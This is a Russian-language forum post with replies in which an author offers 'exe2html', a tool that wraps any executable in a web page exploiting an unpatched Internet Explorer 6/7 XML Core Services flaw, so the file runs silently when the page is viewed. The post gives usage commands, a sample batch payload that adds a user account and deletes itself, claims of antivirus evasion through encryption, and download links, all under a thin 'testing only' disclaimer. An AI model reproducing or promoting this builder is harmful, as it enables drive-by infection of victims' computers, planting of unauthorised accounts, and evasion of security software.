Данная программа написана для того чтобы тестировать уязвимые системы. Вы используете эту программу на свой страх и риск. Автор программы не несет ответственности за то что вы можете натварить с помощью этой программы Если вам понравилась программа то, киньте кто сколько может на кошелек WMZ: Z671833489051 WMR: R156568501269 БУДУ очень благодарен!! ВНИМАНИЕ!!!!!!!!!!!!!!!!! Работа программы основанна уязвимости: MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit Поэтому для запуска прикрепленной программы, необходимо проссмотреть созданную страницу через не пропатченый IE 6/7 МАКСИМАЛЬНЫЙ РАЗМЕР ПРИКРЕПЛЯЕМОЙ ПРОГРАММЫ - 11 КИЛОБАЙТ!!!! ИМЕННО ПО ЭТОМУ АКТУАЛЬНЕЕ ВСЕГО ПРИКРЕПЛЯТЬ *.BAT ФАЙЛЫ И ПРОГРАММЫ НАПИСАННЫЕ НА ASM Ипользование программы: exe2html.exe show_param file_in file_out Где: show_param - парамерт отображения прикрепленной программы при запуске. 1 - Показывать окно 0 - Не показывать окно file_in - файл который встраивается в html страницу. Прикреплять слудует только исполняемые файлы такие как *.exe *.com *.bat file_out - выходной файл в котором будет находиться готовая страница. Для того чтобы запустился код в html-файле файл должен иметь расширение: *.html *.htm Принцип работы: При проссмотре созданной странице через IE - запускается код помешенный в страницу, этот код сохраняет прекрепленную программу в папку TEMP и заупускает её Пример использования: 1) exe2html.exe 1 c:\1.exe c:\2.html Создаст на диске C: файл 2.html в которую запихнет программу 1.exe находящююся на диске C: При запуске прикрепленной программы окно будет показываться. 2) exe2html.exe 0 c:\1.bat c:\2.html Создаст на диске C: файл 2.html в которую запихнет пакетный файл 1.bat находящююся на диске C: При запуске пакетного файла окно не будет показываться. В пакетный файл может выглядеть следующим образом: net user myuser mypass /add del %0 т.е. создаст пользователся myuser с паролем mypass и удалит сам себя. Связь с автором программы: ICQ: 266-334-734 E-mail: [email protected] WMZ: Z671833489051 WMR: R156568501269 Кому будет нужна программа, то стучитель ко мне в ICQ 266-334-734
2 n1†R0x Именно по этому я и написал что прога сделана на базе MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit
ВОт единственное что не поуму, это то чно не на всех компах работает. т.е. шелл-код - 100% работает на 2000 Xp и 2003. На разных компах стоят ослы одинаковых версий. На одном пашет, на другом нет :\
Кстати говоря. Добавил простенькое шифрование страницы. теперь антивири не палят создаваемые страницы. А раньше палили. НО есть маленькое НО: при присабачивании 11 килобайтной проги размер страницы = 127 килобайт
Вот ссылка: http://www.slesh.xost.ru/up.php?act=get&file=exe2html.zip Версия чуть кривоватая. Т.к. из 11 килобайтной проги получается страница в 11 раз больше. т.е. 121 килобайт. Чуть по позже модернизирую чтобы уменьшить размер хотябы в 2-3 раза.
http://www.slesh.xost.ru/up.php?act=get&file=exe2html2.zip Вот вторая версия программы. Улучшеный вариант. Теперь размер страницы становится в среднем в 6 раз больше чем размер прикрепляемой проги. Всё также антивири не палят.
